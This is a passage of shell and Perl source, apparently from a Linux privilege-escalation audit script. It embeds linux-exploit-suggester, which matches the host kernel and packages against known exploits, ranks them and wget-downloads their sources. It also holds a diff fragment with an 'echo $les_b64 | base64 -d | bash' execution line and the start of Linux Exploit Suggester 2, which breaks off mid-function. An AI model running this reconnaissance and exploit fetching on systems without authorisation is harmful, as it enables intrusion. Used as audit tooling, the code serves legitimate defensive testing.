        elif [ "$(grep -E '\.el[1-9]+[\._]' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="RHEL"
        # fedora package listing file
        elif [ "$(grep -E '\.fc[1-9]+'i "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="fedora"
        # mageia package listing file
        elif [ "$(grep -E '\.mga[1-9]+' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="mageia"
        # pacman package listing file
        elif [ "$(grep -E '\ [0-9]+\.' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $1"-"$2}')
            OS="arch"
        # file not recognized - skipping
        else
            PKG_LIST=""
        fi

    elif [ "$distro" = "debian" -o "$distro" = "ubuntu" -o "$distro" = "deepin" ]; then
        PKG_LIST=$(dpkg -l | awk '{print $2"-"$3}' | sed 's/:amd64//g')
    elif [ "$distro" = "RHEL" -o "$distro" = "fedora" -o "$distro" = "mageia" ]; then
        PKG_LIST=$(rpm -qa)
    elif [ "$distro" = "arch" -o "$distro" = "manjaro" ]; then
        PKG_LIST=$(pacman -Q | awk '{print $1"-"$2}')
    elif [ -x /usr/bin/equery ]; then
        PKG_LIST=$(/usr/bin/equery --quiet list '*' -F '$name:$version' | cut -d/ -f2- | awk '{print $1":"$2}')
    else
        # packages listing not available
        PKG_LIST=""
    fi
}

# from: https://stackoverflow.com/questions/4023830/how-compare-two-strings-in-dot-separated-version-format-in-bash
verComparision() {

    if [[ $1 == $2 ]]
    then
        return 0
    fi

    local IFS=.
    local i ver1=($1) ver2=($2)

    # fill empty fields in ver1 with zeros
    for ((i=${#ver1[@]}; i<${#ver2[@]}; i++))
    do
        ver1[i]=0
    done

    for ((i=0; i<${#ver1[@]}; i++))
    do
        if [[ -z ${ver2[i]} ]]
        then
            # fill empty fields in ver2 with zeros
            ver2[i]=0
        fi
        if ((10#${ver1[i]} > 10#${ver2[i]}))
        then
            return 1
        fi
        if ((10#${ver1[i]} < 10#${ver2[i]}))
        then
            return 2
        fi
    done

    return 0
}

doVersionComparision() {
    local reqVersion="$1"
    local reqRelation="$2"
    local currentVersion="$3"

    verComparision $currentVersion $reqVersion
    case $? in
        0) currentRelation='=';;
        1) currentRelation='>';;
        2) currentRelation='<';;
    esac

    if [ "$reqRelation" == "=" ]; then
        [ $currentRelation == "=" ] && return 0
    elif [ "$reqRelation" == ">" ]; then
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<" ]; then
        [ $currentRelation == "<" ] && return 0
    elif [ "$reqRelation" == ">=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == "<" ] && return 0
    fi
}

compareValues() {
    curVal=$1
    val=$2
    sign=$3

    if [ "$sign" == "==" ]; then
        [ "$val" == "$curVal" ] && return 0
    elif [ "$sign" == "!=" ]; then
        [ "$val" != "$curVal" ] && return 0
    fi

    return 1
}

checkRequirement() {
    #echo "Checking requirement: $1"
    local IN="$1"
    local pkgName="${2:4}"

    if [[ "$IN" =~ ^pkg=.*$ ]]; then

        # always true for Linux OS
        [ ${pkgName} == "linux-kernel" ] && return 0

        # verify if package is present 
        pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)
        if [ -n "$pkg" ]; then
            return 0
        fi

    elif [[ "$IN" =~ ^ver.*$ ]]; then
        version="${IN//[^0-9.]/}"
        rest="${IN#ver}"
        operator=${rest%$version}

        if [ "$pkgName" == "linux-kernel" -o "$opt_checksec_mode" == "true" ]; then

            # for --cvelist-file mode skip kernel version comparision
            [ "$opt_cvelist_file" = "true" ] && return 0

            doVersionComparision $version $operator $KERNEL && return 0
        else
            # extract package version and check if requiremnt is true
            pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)

            # skip (if run with --skip-pkg-versions) version checking if package with given name is installed
            [ "$opt_skip_pkg_versions" = "true" -a -n "$pkg" ] && return 0

            # versioning:
            #echo "pkg: $pkg"
            pkgVersion=$(echo "$pkg" | grep -E -i -o -e '-[\.0-9\+:p]+[-\+]' | cut -d':' -f2 | sed 's/[\+-]//g' | sed 's/p[0-9]//g')
            #echo "version: $pkgVersion"
            #echo "operator: $operator"
            #echo "required version: $version"
            #echo
            doVersionComparision $version $operator $pkgVersion && return 0
        fi
    elif [[ "$IN" =~ ^x86_64$ ]] && [ "$ARCH" == "x86_64" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^x86$ ]] && [ "$ARCH" == "i386" -o "$ARCH" == "i686" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^CONFIG_.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p set) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        # if kernel config IS available:
        if [ -n "$KCONFIG" ]; then
            if $KCONFIG | grep -E -qi $IN; then
                return 0;
            # required option wasn't found, exploit is not applicable
            else
                return 1;
            fi
        # config is not available
        else
            return 0;
        fi
    elif [[ "$IN" =~ ^sysctl:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        sysctlCondition="${IN:7}"

        # extract sysctl entry, relation sign and required value
        if echo $sysctlCondition | grep -qi "!="; then
            sign="!="
        elif echo $sysctlCondition | grep -qi "=="; then
            sign="=="
        else
            exitWithErrMsg "Wrong sysctl condition. There is syntax error in your features DB. Aborting."
        fi
        val=$(echo "$sysctlCondition" | awk -F "$sign" '{print $2}')
        entry=$(echo "$sysctlCondition" | awk -F "$sign" '{print $1}')

        # get current setting of sysctl entry
        curVal=$(/sbin/sysctl -a 2> /dev/null | grep "$entry" | awk -F'=' '{print $2}')

        # special case for --checksec mode: return 2 if there is no such switch in sysctl
        [ -z "$curVal" -a "$opt_checksec_mode" = "true" ] && return 2

        # for other modes: skip if there is no such switch in sysctl
        [ -z "$curVal" ] && return 0

        # compare & return result
        compareValues $curVal $val $sign && return 0

    elif [[ "$IN" =~ ^cmd:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        cmd="${IN:4}"
        if eval "${cmd}"; then
            return 0
        fi
    fi

    return 1
}

getKernelConfig() {

    if [ -f /proc/config.gz ] ; then
        KCONFIG="zcat /proc/config.gz"
    elif [ -f /boot/config-`uname -r` ] ; then
        KCONFIG="cat /boot/config-`uname -r`"
    elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then
        KCONFIG="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config"
    else
        KCONFIG=""
    fi
}

checksecMode() {

    MODE=0

    # start analysis
for FEATURE in "${FEATURES[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$FEATURE"

	# modes: kernel-feature (1) | hw-feature (2) | 3rdparty-feature (3) | attack-surface (4)
    NAME="${arr[0]}"
    PRE_NAME="${NAME:0:8}"
    NAME="${NAME:9}"
    if [ "${PRE_NAME}" = "section:" ]; then
		# advance to next MODE
		MODE=$(($MODE + 1))

        echo
        echo -e "${bldwht}${NAME}${txtrst}"
        echo
        continue
    fi

    AVAILABLE="${arr[1]}" && AVAILABLE="${AVAILABLE:11}"
    ENABLE=$(echo "$FEATURE" | grep "enabled: " | awk -F'ed: ' '{print $2}')
    analysis_url=$(echo "$FEATURE" | grep "analysis-url: " | awk '{print $2}')

    # split line with availability requirements & loop thru all availability reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$AVAILABLE"
    AVAILABLE_REQS_NUM=${#array[@]}
    AVAILABLE_PASSED_REQ=0
	CONFIG=""
    for REQ in "${array[@]}"; do

		# find CONFIG_ name (if present) for current feature (only for display purposes)
		if [ -z "$CONFIG" ]; then
			config=$(echo "$REQ" | grep "CONFIG_")
			[ -n "$config" ] && CONFIG="($(echo $REQ | cut -d'=' -f1))"
		fi

        if (checkRequirement "$REQ"); then
            AVAILABLE_PASSED_REQ=$(($AVAILABLE_PASSED_REQ + 1))
        else
            break
        fi
    done

    # split line with enablement requirements & loop thru all enablement reqs one by one & check whether it is met
    ENABLE_PASSED_REQ=0
    ENABLE_REQS_NUM=0
    noSysctl=0
    if [ -n "$ENABLE" ]; then
        IFS=',' read -r -a array <<< "$ENABLE"
        ENABLE_REQS_NUM=${#array[@]}
        for REQ in "${array[@]}"; do
            cmdStdout=$(checkRequirement "$REQ")
            retVal=$?
            if [ $retVal -eq 0 ]; then
                ENABLE_PASSED_REQ=$(($ENABLE_PASSED_REQ + 1))
            elif [ $retVal -eq 2 ]; then
            # special case: sysctl entry is not present on given system: signal it as: N/A
                noSysctl=1
                break
            else
                break
            fi
        done
    fi

    feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)

    if [ -n "$cmdStdout" ]; then
        if [ $cmdStdout -eq 0 ]; then
            state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        else
            state="[ ${txtgrn}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        fi
    else

	unknown="[ ${txtgray}Unknown${txtrst}  ]"

	# for 3rd party (3) mode display "N/A" or "Enabled"
	if [ $MODE -eq 3 ]; then
            enabled="[ ${txtgrn}Enabled${txtrst}   ]"
            disabled="[   ${txtgray}N/A${txtrst}    ]"

        # for attack-surface (4) mode display "Locked" or "Exposed"
        elif [ $MODE -eq 4 ]; then
           enabled="[ ${txtred}Exposed${txtrst}  ]"
           disabled="[ ${txtgrn}Locked${txtrst}   ]"

	# other modes" "Disabled" / "Enabled"
	else
		enabled="[ ${txtgrn}Enabled${txtrst}  ]"
		disabled="[ ${txtred}Disabled${txtrst} ]"
	fi

	if [ -z "$KCONFIG" -a "$ENABLE_REQS_NUM" = 0 ]; then
	    state=$unknown
    elif [ $AVAILABLE_PASSED_REQ -eq $AVAILABLE_REQS_NUM -a $ENABLE_PASSED_REQ -eq $ENABLE_REQS_NUM ]; then
        state=$enabled
    else
        state=$disabled
	fi

    fi

    echo -e " $state $feature ${wht}${CONFIG}${txtrst}"
    [ -n "$analysis_url" ] && echo -e "              $analysis_url"
    echo

done

}

displayExposure() {
    RANK=$1

    if [ "$RANK" -ge 6 ]; then
        echo "highly probable"
    elif [ "$RANK" -ge 3 ]; then
        echo "probable"
    else
        echo "less probable"
    fi
}

# parse command line parameters
ARGS=$(getopt --options $SHORTOPTS  --longoptions $LONGOPTS -- "$@")
[ $? != 0 ] && exitWithErrMsg "Aborting."

eval set -- "$ARGS"

while true; do
    case "$1" in
        -u|--uname)
            shift
            UNAME_A="$1"
            opt_uname_string=true
            ;;
        -V|--version)
            version
            exit 0
            ;;
        -h|--help)
            usage 
            exit 0
            ;;
        -f|--full)
            opt_full=true
            ;;
        -g|--short)
            opt_summary=true
            ;;
        -b|--fetch-binaries)
            opt_fetch_bins=true
            ;;
        -s|--fetch-sources)
            opt_fetch_srcs=true
            ;;
        -k|--kernel)
            shift
            KERNEL="$1"
            opt_kernel_version=true
            ;;
        -d|--show-dos)
            opt_show_dos=true
            ;;
        -p|--pkglist-file)
            shift
            PKGLIST_FILE="$1"
            opt_pkglist_file=true
            ;;
        --cvelist-file)
            shift
            CVELIST_FILE="$1"
            opt_cvelist_file=true
            ;;
        --checksec)
            opt_checksec_mode=true
            ;;
        --kernelspace-only)
            opt_kernel_only=true
            ;;
        --userspace-only)
            opt_userspace_only=true
            ;;
        --skip-more-checks)
            opt_skip_more_checks=true
            ;;
        --skip-pkg-versions)
            opt_skip_pkg_versions=true
            ;;
        *)
            shift
            if [ "$#" != "0" ]; then
                exitWithErrMsg "Unknown option '$1'. Aborting."
            fi
            break
            ;;
    esac
    shift
done

# check Bash version (associative arrays need Bash in version 4.0+)
if ((BASH_VERSINFO[0] < 4)); then
    exitWithErrMsg "Script needs Bash in version 4.0 or newer. Aborting."
fi

# exit if both --kernel and --uname are set
[ "$opt_kernel_version" = "true" ] && [ $opt_uname_string = "true" ] && exitWithErrMsg "Switches -u|--uname and -k|--kernel are mutually exclusive. Aborting."

# exit if both --full and --short are set
[ "$opt_full" = "true" ] && [ $opt_summary = "true" ] && exitWithErrMsg "Switches -f|--full and -g|--short are mutually exclusive. Aborting."

# --cvelist-file mode is standalone mode and is not applicable when one of -k | -u | -p | --checksec switches are set
if [ "$opt_cvelist_file" = "true" ]; then
    [ ! -e "$CVELIST_FILE" ] && exitWithErrMsg "Provided CVE list file does not exists. Aborting."
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --cvelist-file are mutually exclusive. Aborting."
fi

# --checksec mode is standalone mode and is not applicable when one of -k | -u | -p | --cvelist-file switches are set
if [ "$opt_checksec_mode" = "true" ]; then
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --checksec are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --checksec are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --checksec are mutually exclusive. Aborting."
fi

# extract kernel version and other OS info like distro name, distro version, etc. 3 possibilities here:
# case 1: --kernel set
if [ "$opt_kernel_version" == "true" ]; then
    # TODO: add kernel version number validation
    [ -z "$KERNEL" ] && exitWithErrMsg "Unrecognized kernel version given. Aborting."
    ARCH=""
    OS=""

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 2: --uname set
elif [ "$opt_uname_string" == "true" ]; then
    [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
    parseUname "$UNAME_A"

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 3: --cvelist-file mode
elif [ "$opt_cvelist_file" = "true" ]; then

    # get kernel configuration in this mode
    [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

# case 4: --checksec mode
elif [ "$opt_checksec_mode" = "true" ]; then

    # this switch is not applicable in this mode
    opt_skip_more_checks=false

    # get kernel configuration in this mode
    getKernelConfig
    [ -z "$KCONFIG" ] && echo "WARNING. Kernel Config not found on the system results won't be complete."

    # launch checksec mode
    checksecMode

    exit 0

# case 5: no --uname | --kernel | --cvelist-file | --checksec set
else

    # --pkglist-file NOT provided: take all info from current machine
    # case for vanilla execution: ./linux-exploit-suggester.sh
    if [ "$opt_pkglist_file" == "false" ]; then
        UNAME_A=$(uname -a)
        [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
        parseUname "$UNAME_A"

        # get kernel configuration in this mode
        [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

        # extract distribution version from /etc/os-release OR /etc/lsb-release
        [ -n "$OS" -a "$opt_skip_more_checks" = "false" ] && DISTRO=$(grep -s -E '^DISTRIB_RELEASE=|^VERSION_ID=' /etc/*-release | cut -d'=' -f2 | head -1 | tr -d '"')

        # extract package listing from current OS
        getPkgList "$OS" ""

    # --pkglist-file provided: only consider userspace exploits against provided package listing
    else
        KERNEL=""
        #TODO: extract machine arch from package listing
        ARCH=""
        unset EXPLOITS
        declare -A EXPLOITS
        getPkgList "" "$PKGLIST_FILE"

        # additional checks are not applicable for this mode
        opt_skip_more_checks=true
    fi
fi

echo
echo -e "${bldwht}Available information:${txtrst}"
echo
[ -n "$KERNEL" ] && echo -e "Kernel version: ${txtgrn}$KERNEL${txtrst}" || echo -e "Kernel version: ${txtred}N/A${txtrst}"
echo "Architecture: $([ -n "$ARCH" ] && echo -e "${txtgrn}$ARCH${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo "Distribution: $([ -n "$OS" ] && echo -e "${txtgrn}$OS${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo -e "Distribution version: $([ -n "$DISTRO" ] && echo -e "${txtgrn}$DISTRO${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

echo "Additional checks (CONFIG_*, sysctl entries, custom Bash commands): $([ "$opt_skip_more_checks" == "false" ] && echo -e "${txtgrn}performed${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

if [ -n "$PKGLIST_FILE" -a -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}$PKGLIST_FILE${txtrst}"
elif [ -n "$PKGLIST_FILE" ]; then
    pkgListFile="${txtred}unrecognized file provided${txtrst}"
elif [ -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}from current OS${txtrst}"
fi

echo -e "Package listing: $([ -n "$pkgListFile" ] && echo -e "$pkgListFile" || echo -e "${txtred}N/A${txtrst}")"

# handle --kernelspacy-only & --userspace-only filter options
if [ "$opt_kernel_only" = "true" -o -z "$PKG_LIST" ]; then
    unset EXPLOITS_USERSPACE
    declare -A EXPLOITS_USERSPACE
fi

if [ "$opt_userspace_only" = "true" ]; then
    unset EXPLOITS
    declare -A EXPLOITS
fi

echo
echo -e "${bldwht}Searching among:${txtrst}"
echo
echo "${#EXPLOITS[@]} kernel space exploits"
echo "${#EXPLOITS_USERSPACE[@]} user space exploits"
echo

echo -e "${bldwht}Possible Exploits:${txtrst}"
echo

# start analysis
j=0
for EXP in "${EXPLOITS[@]}" "${EXPLOITS_USERSPACE[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && TAGS="${TAGS:6}"
    RANK="${arr[3]}" && RANK="${RANK:6}"

    # split line with requirements & loop thru all reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$REQS"
    REQS_NUM=${#array[@]}
    PASSED_REQ=0
    for REQ in "${array[@]}"; do
        if (checkRequirement "$REQ" "${array[0]}"); then
            PASSED_REQ=$(($PASSED_REQ + 1))
        else
            break
        fi
    done

    # execute for exploits with all requirements met
    if [ $PASSED_REQ -eq $REQS_NUM ]; then

        # additional requirement for --cvelist-file mode: check if CVE associated with the exploit is on the CVELIST_FILE
        if [ "$opt_cvelist_file" = "true" ]; then

            # extract CVE(s) associated with given exploit (also translates ',' to '|' for easy handling multiple CVEs case - via extended regex)
            cve=$(echo "$NAME" | grep '.*\[.*\].*' | cut -d 'm' -f2 | cut -d ']' -f1 | tr -d '[' | tr "," "|")
            #echo "CVE: $cve"

            # check if it's on CVELIST_FILE list, if no move to next exploit
            [ ! $(cat "$CVELIST_FILE" | grep -E "$cve") ] && continue
        fi

        # process tags and highlight those that match current OS (only for deb|ubuntu|RHEL and if we know distro version - direct mode)
        tags=""
        if [ -n "$TAGS" -a -n "$OS" ]; then
            IFS=',' read -r -a tags_array <<< "$TAGS"
            TAGS_NUM=${#tags_array[@]}

            # bump RANK slightly (+1) if we're in '--uname' mode and there's a TAG for OS from uname string
            [ "$(echo "${tags_array[@]}" | grep "$OS")" -a "$opt_uname_string" == "true" ] && RANK=$(($RANK + 1))

            for TAG in "${tags_array[@]}"; do
                tag_distro=$(echo "$TAG" | cut -d'=' -f1)
                tag_distro_num_all=$(echo "$TAG" | cut -d'=' -f2)
                # in case of tag of form: 'ubuntu=16.04{kernel:4.4.0-21} remove kernel versioning part for comparision
                tag_distro_num="${tag_distro_num_all%{*}"

                # we're in '--uname' mode OR (for normal mode) if there is distro version match
                if [ "$opt_uname_string" == "true" -o \( "$OS" == "$tag_distro" -a "$(echo "$DISTRO" | grep -E "$tag_distro_num")" \) ]; then

                    # bump current exploit's rank by 2 for distro match (and not in '--uname' mode)
                    [ "$opt_uname_string" == "false" ] && RANK=$(($RANK + 2))

                    # get name (kernel or package name) and version of kernel/pkg if provided:
                    tag_pkg=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 1)
                    tag_pkg_num=""
                    [ $(echo "$tag_distro_num_all" | grep '{') ] && tag_pkg_num=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 2)

                    #[ -n "$tag_pkg_num" ] && echo "tag_pkg_num: $tag_pkg_num; kernel: $KERNEL_ALL"

                    # if pkg/kernel version is not provided:
                    if [ -z "$tag_pkg_num" ]; then
                        [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ ${TAG} ]${txtrst}"

                    # kernel version provided, check for match:
                    elif [ -n "$tag_pkg_num" -a "$tag_pkg" = "kernel" ]; then
                        if [ $(echo "$KERNEL_ALL" | grep -E "${tag_pkg_num}") ]; then
                            # kernel version matched - bold highlight
                            TAG="${yellow}[ ${TAG} ]${txtrst}"

                            # bump current exploit's rank additionally by 3 for kernel version regex match
                            RANK=$(($RANK + 3))
                        else
                            [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{kernel:$tag_pkg_num}"
                        fi

                    # pkg version provided, check for match (TBD):
                    elif [ -n "$tag_pkg_num" -a -n "$tag_pkg"  ]; then
                        TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{$tag_pkg:$tag_pkg_num}"
                    fi

                fi

                # append current tag to tags list
                tags="${tags}${TAG},"
            done
            # trim ',' added by above loop
            [ -n "$tags" ] && tags="${tags%?}"
        else
            tags="$TAGS"
        fi

        # insert the matched exploit (with calculated Rank and highlighted tags) to arrary that will be sorted
        EXP=$(echo "$EXP" | sed -e '/^Name:/d' -e '/^Reqs:/d' -e '/^Tags:/d')
        exploits_to_sort[j]="${RANK}Name: ${NAME}D3L1mReqs: ${REQS}D3L1mTags: ${tags}D3L1m$(echo "$EXP" | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/D3L1m/g')"
        ((j++))
    fi
done

# sort exploits based on calculated Rank
IFS=$'\n'
SORTED_EXPLOITS=($(sort -r <<<"${exploits_to_sort[*]}"))
unset IFS

# display sorted exploits
for EXP_TEMP in "${SORTED_EXPLOITS[@]}"; do

	RANK=$(echo "$EXP_TEMP" | awk -F'Name:' '{print $1}')

	# convert entry back to canonical form
	EXP=$(echo "$EXP_TEMP" | sed 's/^[0-9]//g' | sed 's/D3L1m/\n/g')

	# create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && tags="${TAGS:6}"

	EXPLOIT_DB=$(echo "$EXP" | grep "exploit-db: " | awk '{print $2}')
	analysis_url=$(echo "$EXP" | grep "analysis-url: " | awk '{print $2}')
	ext_url=$(echo "$EXP" | grep "ext-url: " | awk '{print $2}')
	comments=$(echo "$EXP" | grep "Comments: " | cut -d' ' -f 2-)
	reqs=$(echo "$EXP" | grep "Reqs: " | cut -d' ' -f 2)

	# exploit name without CVE number and without commonly used special chars
	name=$(echo "$NAME" | cut -d' ' -f 2- | tr -d ' ()/')

	bin_url=$(echo "$EXP" | grep "bin-url: " | awk '{print $2}')
	src_url=$(echo "$EXP" | grep "src-url: " | awk '{print $2}')
	[ -z "$src_url" ] && [ -n "$EXPLOIT_DB" ] && src_url="https://www.exploit-db.com/download/$EXPLOIT_DB"
	[ -z "$src_url" ] && [ -z "$bin_url" ] && exitWithErrMsg "'src-url' / 'bin-url' / 'exploit-db' entries are all empty for '$NAME' exploit - fix that. Aborting."

	if [ -n "$analysis_url" ]; then
        details="$analysis_url"
	elif $(echo "$src_url" | grep -q 'www.exploit-db.com'); then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	elif [[ "$src_url" =~ ^.*tgz|tar.gz|zip$ && -n "$EXPLOIT_DB" ]]; then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	else
        details="$src_url"
	fi

	# skip DoS by default
	dos=$(echo "$EXP" | grep -o -i "(dos")
	[ "$opt_show_dos" == "false" ] && [ -n "$dos" ] && continue

	# handles --fetch-binaries option
	if [ $opt_fetch_bins = "true" ]; then
        for i in $(echo "$EXP" | grep "bin-url: " | awk '{print $2}'); do
            [ -f "${name}_$(basename $i)" ] && rm -f "${name}_$(basename $i)"
            wget -q -k "$i" -O "${name}_$(basename $i)"
        done
    fi

	# handles --fetch-sources option
	if [ $opt_fetch_srcs = "true" ]; then
        [ -f "${name}_$(basename $src_url)" ] && rm -f "${name}_$(basename $src_url)"
        wget -q -k "$src_url" -O "${name}_$(basename $src_url)" &
    fi

    # display result (short)
	if [ "$opt_summary" = "true" ]; then
	[ -z "$tags" ] && tags="-"
	echo -e "$NAME || $tags || $src_url"
	continue
	fi

# display result (standard)
	echo -e "[+] $NAME"
	echo -e "\n   Details: $details"
        echo -e "   Exposure: $(displayExposure $RANK)"
        [ -n "$tags" ] && echo -e "   Tags: $tags"
        echo -e "   Download URL: $src_url"
        [ -n "$ext_url" ] && echo -e "   ext-url: $ext_url"
        [ -n "$comments" ] && echo -e "   Comments: $comments"

        # handles --full filter option
        if [ "$opt_full" = "true" ]; then
            [ -n "$reqs" ] && echo -e "   Requirements: $reqs"

            [ -n "$EXPLOIT_DB" ] && echo -e "   exploit-db: $EXPLOIT_DB"

            author=$(echo "$EXP" | grep "author: " | cut -d' ' -f 2-)
            [ -n "$author" ] && echo -e "   author: $author"
        fi

        echo

done
" + echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g" echo "" fi @@ -1303,7 +1472,7 @@ if [ "$(command -v perl 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester 2" print_info "https://github.com/jondonas/linux-exploit-suggester-2" les2_b64="#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;

our $VERSION = '2';

my %opts;
getopts( 'k:hd', \%opts );
if (exists $opts{h}) {
    usage();
    exit;
};

print_banner();
my ( $khost, $is_partial ) = get_kernel();
print "  Local Kernel: \e[00;33m$khost\e[00m\n";

my %exploits = get_exploits();
print '  Searching ' . scalar keys(%exploits) . " exploits...\n\n";
print "  \e[1;35mPossible Exploits\e[00m\n";

my $count = 1;
my @applicable = ();
EXPLOIT:
foreach my $key ( sort keys %exploits ) {
    foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {

        if (     $khost eq $kernel
              or ( $is_partial and index($kernel,$khost) == 0 )
        ) {
            $exploits{$key}{key} = $key;
            push(@applicable, $exploits{$key});
            print "  \e[00;33m[\e[00m\e[00;31m$count\e[00m\e[00;33m]\e[00m ";
            print "\e[00;33m$key\e[00m";
            print " \e[00;33m($kernel)\e[00m" if $is_partial;

            my $alt = $exploits{$key}{alt};
            my $cve = $exploits{$key}{cve};
            my $mlw = $exploits{$key}{mil};
            if ( $alt or $cve ) {
                print "\n";
            }
            if ( $alt ) { print "      Alt: $alt "; }
            if ( $cve ) { print "      CVE-$cve"; }
            if ( $mlw ) { print "\n      Source: $mlw"; }
            print "\n";
            $count += 1;
            next EXPLOIT;
        }
    }
}
print "\n";

if (!@applicable) {
    print "  No exploits are available for this kernel version\n\n";
    exit;
}

if (exists $opts{d}) {
    print "  \e[1;36mExploit Download\e[00m\n";
    print "  (Download all: \e[00;33m'a'\e[00m / Individually: \e[00;33m'2,4,5'\e[00m ";
    print "/ Exit: \e[00;33m^c\e[00m)\n";
    print "  Select exploits to download: ";

    while (1) {
        my $input = <STDIN>;
        $input =~ s/\s+//g;

        if ($input =~ /^a$/) {
            my @selected = ();
            for (my $i=1; $i <= scalar @applicable; $i++) {
               push(@selected, $i);
            }
            download_exploits(\@selected, \@applicable);
            last;
        }
        elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
            my @selected = uniq(split(',', $input));
            @selected = sort {$a <=> $b} @selected;
            if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
                download_exploits(\@selected, \@applicable);
                last;
            }
            else {
               print "  \e[00;31mInput is out of range.\e[00m Select exploits to download: ";
            }
        }
        else {
            print "  \e[00;31mInvalid input.\e[00m Select exploits to download: ";
        }
    }
};
exit;

######################
## extra functions  ##
######################

sub get_kernel {
    my $khost = '';

    if ( exists $opts{k} ) {
        $khost = $opts{k};
    }
    else {
        $khost = `uname -r |cut -d"-" -f1`;
        chomp $khost;
    }

    if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
        print "  \e[00;31mSpecified kernel is in the wrong format\e[00m\n";
        print "  Try a kernel format like this: 3.2.0\n\n";
        exit;
    }

    # partial kernels might be provided by the user,
    # such as '2.4' or '2.6.'
    my $is_partial = $khost =~ /^\d+\.\d+\.\d?/ ? 0 : 1;
    return ( $khost, $is_partial );
}

sub download_exploits {
    my ($sref, $aref) = @_;
    my @selected = @{ $sref };
    my @applicable = @{ $aref };
    my $exploit_base = "www.exploit-db.com/exploits";
    my $download_base = "https://www.exploit-db.com/raw/";
    print "\n";

    foreach my $num (@selected) {
        my $mil = $applicable[$num-1]{mil};
